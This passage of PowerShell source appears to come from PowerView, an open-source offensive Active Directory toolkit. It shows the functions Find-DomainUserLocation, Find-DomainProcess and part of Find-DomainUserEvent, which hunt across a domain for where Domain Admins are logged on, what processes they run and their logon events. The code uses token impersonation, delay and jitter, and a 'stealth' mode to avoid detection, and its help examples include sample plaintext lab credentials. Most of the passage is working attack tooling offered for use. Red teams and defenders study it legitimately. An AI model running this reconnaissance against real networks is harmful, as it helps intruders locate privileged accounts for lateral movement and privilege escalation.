$FileServers = Get-DomainFileServer @FileServerSearcherArguments
if ($FileServers -isnot [System.Array]) { $FileServers = @($FileServers) }
$TargetComputerArrayList.AddRange( $FileServers )
}
if ($StealthSource -match 'DFS|All') {
Write-Verbose '[Find-DomainUserLocation] Querying for DFS servers'
# # TODO: fix the passed parameters to Get-DomainDFSShare
# $ComputerName += Get-DomainDFSShare -Domain $Domain -Server $DomainController | ForEach-Object {$_.RemoteServerName}
}
if ($StealthSource -match 'DC|All') {
Write-Verbose '[Find-DomainUserLocation] Querying for domain controllers'
$DCSearcherArguments = @{
'LDAP' = $True
}
if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['ComputerDomain']) { $DCSearcherArguments['Domain'] = $ComputerDomain }
if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential }
$DomainControllers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname
if ($DomainControllers -isnot [System.Array]) { $DomainControllers = @($DomainControllers) }
$TargetComputerArrayList.AddRange( $DomainControllers )
}
$TargetComputers = $TargetComputerArrayList.ToArray()
}
else {
Write-Verbose '[Find-DomainUserLocation] Querying for all computers in the domain'
$TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
}
Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)"
if ($TargetComputers.Length -eq 0) {
throw '[Find-DomainUserLocation] No hosts found to enumerate'
}
# get the current user so we can ignore it in the results
if ($PSBoundParameters['Credential']) {
$CurrentUser = $Credential.GetNetworkCredential().UserName
}
else {
$CurrentUser = ([Environment]::UserName).ToLower()
}
# now build the user target set
if ($PSBoundParameters['ShowAll']) {
$TargetUsers = @()
}
elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) {
$TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname
}
else {
$GroupSearcherArguments = @{
'Identity' = $UserGroupIdentity
'Recurse' = $True
}
if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }
if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }
if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }
$TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName
}
Write-Verbose "[Find-DomainUserLocation] TargetUsers length: $($TargetUsers.Length)"
if ((-not $ShowAll) -and ($TargetUsers.Length -eq 0)) {
throw '[Find-DomainUserLocation] No users found to target'
}
# the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
Param($ComputerName, $TargetUsers, $CurrentUser, $Stealth, $TokenHandle)
if ($TokenHandle) {
# impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
$Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
}
ForEach ($TargetComputer in $ComputerName) {
$Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
if ($Up) {
$Sessions = Get-NetSession -ComputerName $TargetComputer
ForEach ($Session in $Sessions) {
$UserName = $Session.UserName
$CName = $Session.CName
if ($CName -and $CName.StartsWith('\\')) {
$CName = $CName.TrimStart('\')
}
# make sure we have a result, and ignore computer$ sessions
if (($UserName) -and ($UserName.Trim() -ne '') -and ($UserName -notmatch $CurrentUser) -and ($UserName -notmatch '\$$')) {
if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName)) {
$UserLocation = New-Object PSObject
$UserLocation | Add-Member Noteproperty 'UserDomain' $Null
$UserLocation | Add-Member Noteproperty 'UserName' $UserName
$UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer
$UserLocation | Add-Member Noteproperty 'SessionFrom' $CName
# try to resolve the DNS hostname of $Cname
try {
$CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName
$UserLocation | Add-Member NoteProperty 'SessionFromName' $CnameDNSName
}
catch {
$UserLocation | Add-Member NoteProperty 'SessionFromName' $Null
}
# see if we're checking to see if we have local admin access on this machine
if ($CheckAccess) {
$Admin = (Test-AdminAccess -ComputerName $CName).IsAdmin
$UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
}
else {
$UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null
}
$UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation')
$UserLocation
}
}
}
if (-not $Stealth) {
# if we're not 'stealthy', enumerate loggedon users as well
$LoggedOn = Get-NetLoggedon -ComputerName $TargetComputer
ForEach ($User in $LoggedOn) {
$UserName = $User.UserName
$UserDomain = $User.LogonDomain
# make sure wet have a result
if (($UserName) -and ($UserName.trim() -ne '')) {
if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName) -and ($UserName -notmatch '\$$')) {
$IPAddress = @(Resolve-IPAddress -ComputerName $TargetComputer)[0].IPAddress
$UserLocation = New-Object PSObject
$UserLocation | Add-Member Noteproperty 'UserDomain' $UserDomain
$UserLocation | Add-Member Noteproperty 'UserName' $UserName
$UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer
$UserLocation | Add-Member Noteproperty 'IPAddress' $IPAddress
$UserLocation | Add-Member Noteproperty 'SessionFrom' $Null
$UserLocation | Add-Member Noteproperty 'SessionFromName' $Null
# see if we're checking to see if we have local admin access on this machine
if ($CheckAccess) {
$Admin = Test-AdminAccess -ComputerName $TargetComputer
$UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
}
else {
$UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null
}
$UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation')
$UserLocation
}
}
}
}
}
}
if ($TokenHandle) {
Invoke-RevertToSelf
}
}
$LogonToken = $Null
if ($PSBoundParameters['Credential']) {
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
else {
$LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
}
}
}
PROCESS {
# only ignore threading if -Delay is passed
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
Write-Verbose "[Find-DomainUserLocation] Total number of hosts: $($TargetComputers.count)"
Write-Verbose "[Find-DomainUserLocation] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
$RandNo = New-Object System.Random
ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
Write-Verbose "[Find-DomainUserLocation] Enumerating server $Computer ($Counter of $($TargetComputers.Count))"
Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetUsers, $CurrentUser, $Stealth, $LogonToken
if ($Result -and $StopOnSuccess) {
Write-Verbose "[Find-DomainUserLocation] Target user found, returning early"
return
}
}
}
else {
Write-Verbose "[Find-DomainUserLocation] Using threading with threads: $Threads"
Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)"
# if we're using threading, kick off the script block with New-ThreadedFunction
$ScriptParams = @{
'TargetUsers' = $TargetUsers
'CurrentUser' = $CurrentUser
'Stealth' = $Stealth
'TokenHandle' = $LogonToken
}
# if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Find-DomainProcess {
<#
.SYNOPSIS
Searches for processes on the domain using WMI, returning processes
that match a particular user specification or process name.
Thanks to @paulbrandau for the approach idea.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction
.DESCRIPTION
This function enumerates all machines on the current (or specified) domain
using Get-DomainComputer, and queries the domain for users of a specified group
(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the
function enumerates any current processes running with Get-WMIProcess,
searching for processes running under any target user contexts or with the
specified -ProcessName. If -Credential is passed, it is passed through to
the underlying WMI commands used to enumerate the remote machines.
.PARAMETER ComputerName
Specifies an array of one or more hosts to enumerate, passable on the pipeline.
If -ComputerName is not passed, the default behavior is to enumerate all machines
in the domain returned by Get-DomainComputer.
.PARAMETER Domain
Specifies the domain to query for computers AND users, defaults to the current domain.
.PARAMETER ComputerDomain
Specifies the domain to query for computers, defaults to the current domain.
.PARAMETER ComputerLDAPFilter
Specifies an LDAP query string that is used to search for computer objects.
.PARAMETER ComputerSearchBase
Specifies the LDAP source to search through for computers,
e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
.PARAMETER ComputerUnconstrained
Switch. Search computer objects that have unconstrained delegation.
.PARAMETER ComputerOperatingSystem
Search computers with a specific operating system, wildcards accepted.
.PARAMETER ComputerServicePack
Search computers with a specific service pack, wildcards accepted.
.PARAMETER ComputerSiteName
Search computers in the specific AD Site name, wildcards accepted.
.PARAMETER ProcessName
Search for processes with one or more specific names.
.PARAMETER UserIdentity
Specifies one or more user identities to search for.
.PARAMETER UserDomain
Specifies the domain to query for users to search for, defaults to the current domain.
.PARAMETER UserLDAPFilter
Specifies an LDAP query string that is used to search for target users.
.PARAMETER UserSearchBase
Specifies the LDAP source to search through for target users.
e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
.PARAMETER UserGroupIdentity
Specifies a group identity to query for target users, defaults to 'Domain Admins.
If any other user specifications are set, then UserGroupIdentity is ignored.
.PARAMETER UserAdminCount
Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain and target systems.
.PARAMETER StopOnSuccess
Switch. Stop hunting after finding after finding a target user.
.PARAMETER Delay
Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.PARAMETER Threads
The number of threads to use for user searching, defaults to 20.
.EXAMPLE
Find-DomainProcess
Searches for processes run by 'Domain Admins' by enumerating every computer in the domain.
.EXAMPLE
Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by
privileged users in dev.testlab.local.
.EXAMPLE
Find-DomainProcess -ProcessName putty.exe
Searchings for instances of putty.exe running on the current domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Find-DomainProcess -Domain testlab.local -Credential $Cred
Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials.
.OUTPUTS
PowerView.UserProcess
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
[OutputType('PowerView.UserProcess')]
[CmdletBinding(DefaultParameterSetName = 'None')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DNSHostName')]
[String[]]
$ComputerName,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[String]
$ComputerDomain,
[ValidateNotNullOrEmpty()]
[String]
$ComputerLDAPFilter,
[ValidateNotNullOrEmpty()]
[String]
$ComputerSearchBase,
[Alias('Unconstrained')]
[Switch]
$ComputerUnconstrained,
[ValidateNotNullOrEmpty()]
[Alias('OperatingSystem')]
[String]
$ComputerOperatingSystem,
[ValidateNotNullOrEmpty()]
[Alias('ServicePack')]
[String]
$ComputerServicePack,
[ValidateNotNullOrEmpty()]
[Alias('SiteName')]
[String]
$ComputerSiteName,
[Parameter(ParameterSetName = 'TargetProcess')]
[ValidateNotNullOrEmpty()]
[String[]]
$ProcessName,
[Parameter(ParameterSetName = 'TargetUser')]
[Parameter(ParameterSetName = 'UserIdentity')]
[ValidateNotNullOrEmpty()]
[String[]]
$UserIdentity,
[Parameter(ParameterSetName = 'TargetUser')]
[ValidateNotNullOrEmpty()]
[String]
$UserDomain,
[Parameter(ParameterSetName = 'TargetUser')]
[ValidateNotNullOrEmpty()]
[String]
$UserLDAPFilter,
[Parameter(ParameterSetName = 'TargetUser')]
[ValidateNotNullOrEmpty()]
[String]
$UserSearchBase,
[ValidateNotNullOrEmpty()]
[Alias('GroupName', 'Group')]
[String[]]
$UserGroupIdentity = 'Domain Admins',
[Parameter(ParameterSetName = 'TargetUser')]
[Alias('AdminCount')]
[Switch]
$UserAdminCount,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$StopOnSuccess,
[ValidateRange(1, 10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[Int]
[ValidateRange(1, 100)]
$Threads = 20
)
BEGIN {
$ComputerSearcherArguments = @{
'Properties' = 'dnshostname'
}
if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
$UserSearcherArguments = @{
'Properties' = 'samaccountname'
}
if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
# first, build the set of computers to enumerate
if ($PSBoundParameters['ComputerName']) {
$TargetComputers = $ComputerName
}
else {
Write-Verbose '[Find-DomainProcess] Querying computers in the domain'
$TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
Write-Verbose "[Find-DomainProcess] TargetComputers length: $($TargetComputers.Length)"
if ($TargetComputers.Length -eq 0) {
throw '[Find-DomainProcess] No hosts found to enumerate'
}
# now build the user target set
if ($PSBoundParameters['ProcessName']) {
$TargetProcessName = @()
ForEach ($T in $ProcessName) {
$TargetProcessName += $T.Split(',')
}
if ($TargetProcessName -isnot [System.Array]) {
$TargetProcessName = [String[]] @($TargetProcessName)
}
}
elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) {
$TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname
}
else {
$GroupSearcherArguments = @{
'Identity' = $UserGroupIdentity
'Recurse' = $True
}
if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }
if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }
if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }
$GroupSearcherArguments
$TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName
}
# the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
Param($ComputerName, $ProcessName, $TargetUsers, $Credential)
ForEach ($TargetComputer in $ComputerName) {
$Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
if ($Up) {
# try to enumerate all active processes on the remote host
# and search for a specific process name
if ($Credential) {
$Processes = Get-WMIProcess -Credential $Credential -ComputerName $TargetComputer -ErrorAction SilentlyContinue
}
else {
$Processes = Get-WMIProcess -ComputerName $TargetComputer -ErrorAction SilentlyContinue
}
ForEach ($Process in $Processes) {
# if we're hunting for a process name or comma-separated names
if ($ProcessName) {
if ($ProcessName -Contains $Process.ProcessName) {
$Process
}
}
# if the session user is in the target list, display some output
elseif ($TargetUsers -Contains $Process.User) {
$Process
}
}
}
}
}
}
PROCESS {
# only ignore threading if -Delay is passed
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
Write-Verbose "[Find-DomainProcess] Total number of hosts: $($TargetComputers.count)"
Write-Verbose "[Find-DomainProcess] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
$RandNo = New-Object System.Random
ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
Write-Verbose "[Find-DomainProcess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
$Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetProcessName, $TargetUsers, $Credential
$Result
if ($Result -and $StopOnSuccess) {
Write-Verbose "[Find-DomainProcess] Target user found, returning early"
return
}
}
}
else {
Write-Verbose "[Find-DomainProcess] Using threading with threads: $Threads"
# if we're using threading, kick off the script block with New-ThreadedFunction
$ScriptParams = @{
'ProcessName' = $TargetProcessName
'TargetUsers' = $TargetUsers
'Credential' = $Credential
}
# if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
}
}
function Find-DomainUserEvent {
<#
.SYNOPSIS
Finds logon events on the current (or remote domain) for the specified users.
Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction
.DESCRIPTION
Enumerates all domain controllers from the specified -Domain
(default of the local domain) using Get-DomainController, enumerates
the logon events for each using Get-DomainUserEvent, and filters
the results based on the targeting criteria.
.PARAMETER ComputerName
Specifies an explicit computer name to retrieve events from.
.PARAMETER Domain
Specifies a domain to query for domain controllers to enumerate.
Defaults to the current domain.
.PARAMETER Filter
A hashtable of PowerView.LogonEvent properties to filter for.
The 'op|operator|operation' clause can have '&', '|', 'and', or 'or',
and is 'or' by default, meaning at least one clause matches instead of all.
See the exaples for usage.
.PARAMETER StartTime
The [DateTime] object representing the start of when to collect events.
Default of [DateTime]::Now.AddDays(-1).
.PARAMETER EndTime
The [DateTime] object representing the end of when to collect events.
Default of [DateTime]::Now.
.PARAMETER MaxEvents
The maximum number of events (per host) to retrieve. Default of 5000.
.PARAMETER UserIdentity
Specifies one or more user identities to search for.
.PARAMETER UserDomain
Specifies the domain to query for users to search for, defaults to the current domain.
.PARAMETER UserLDAPFilter
Specifies an LDAP query string that is used to search for target users.
.PARAMETER UserSearchBase
Specifies the LDAP source to search through for target users.
e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
.PARAMETER UserGroupIdentity
Specifies a group identity to query for target users, defaults to 'Domain Admins.
If any other user specifications are set, then UserGroupIdentity is ignored.
.PARAMETER UserAdminCount
Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target computer(s).
.PARAMETER StopOnSuccess
Switch. Stop hunting after finding after finding a target user.
.PARAMETER Delay
Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.PARAMETER Threads
The number of threads to use for user searching, defaults to 20.
.EXAMPLE
Find-DomainUserEvent
Search for any user events matching domain admins on every DC in the current domain.
.EXAMPLE
$cred = Get-Credential dev\administrator
Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john'
Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local'
domain controller using the alternate credential
.EXAMPLE
'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'}
Find user events on the primary.testlab.local system where the event matches
the IPAddress '192.168.52.200' or '192.168.52.201'.
.EXAMPLE
$cred = Get-Credential testlab\administrator
Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'}
Find user events mathing the specified GUID AND the specified TargetLogonId, searching
through every domain controller in the current domain, enumerating each DC in serial
instead of in a threaded manner, using the alternate credential.
.OUTPUTS
PowerView.LogonEvent
PowerView.ExplicitCredentialLogon
.LINK
http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
[OutputType('PowerView.LogonEvent')]
[OutputType('PowerView.ExplicitCredentialLogon')]
[CmdletBinding(DefaultParameterSetName = 'Domain')]
Param(
[Parameter(ParameterSetName = 'ComputerName', Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('dnshostname', 'HostName', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName,
[Parameter(ParameterSetName = 'Domain')]
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Hashtable]
$Filter,
[Parameter(ValueFromPipelineByPropertyName = $True)]
[ValidateNotNullOrEmpty()]
[DateTime]
$StartTime = [DateTime]::Now.AddDays(-1),
[Parameter(ValueFromPipelineByPropertyName = $True)]
[ValidateNotNullOrEmpty()]
[DateTime]
$EndTime = [DateTime]::Now,
[ValidateRange(1, 1000000)]
[Int]
$MaxEvents = 5000,
[ValidateNotNullOrEmpty()]
[String[]]
$UserIdentity,
[ValidateNotNullOrEmpty()]
[String]
$UserDomain,
[ValidateNotNullOrEmpty()]
[String]
$UserLDAPFilter,
[ValidateNotNullOrEmpty()]
[String]
$UserSearchBase,
[ValidateNotNullOrEmpty()]
[Alias('GroupName', 'Group')]
[String[]]
$UserGroupIdentity = 'Domain Admins',
[Alias('AdminCount')]
[Switch]
$UserAdminCount,
[Switch]
$CheckAccess,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$StopOnSuccess,
[ValidateRange(1, 10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[Int]
[ValidateRange(1, 100)]
$Threads = 20
)
BEGIN {
$UserSearcherArguments = @{
'Properties' = 'samaccountname'
}
if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount']) {
$TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname
}
elseif ($PSBoundParameters['UserGroupIdentity'] -or (-not $PSBoundParameters['Filter'])) {
# otherwise we're querying a specific group
$GroupSearcherArguments = @{
'Identity' = $UserGroupIdentity
'Recurse' = $True
}
Write-Verbose "UserGroupIdentity: $UserGroupIdentity"
if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }
if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }
if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }
